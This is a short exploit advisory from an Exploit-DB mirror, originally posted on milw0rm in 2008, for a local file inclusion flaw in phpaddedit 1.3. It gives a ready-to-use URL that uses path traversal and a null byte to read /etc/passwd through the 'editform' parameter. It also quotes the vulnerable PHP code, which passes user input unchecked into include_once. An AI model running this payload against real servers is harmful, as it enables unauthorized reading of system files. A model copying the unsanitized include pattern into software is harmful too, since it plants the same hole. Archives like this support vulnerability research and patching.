exploit-db-mirror/exploits/php/webapps/7417.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

27 lines
No EOL
641 B
Text

#phpaddedit-1.3 LFI
#Author: nuclear
#script:http://sourceforge.net/projects/phpaddedit/
#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00
#vulnerable code:
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
...
if ( $error_message || $error || !$_POST["submitval"] ) {
include_once ($formname."-header.inc.php");
include_once ($addeditcwd."addedit-create-form.php");
include_once ($formname."-footer.inc.php");
}
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r
# milw0rm.com [2008-12-10]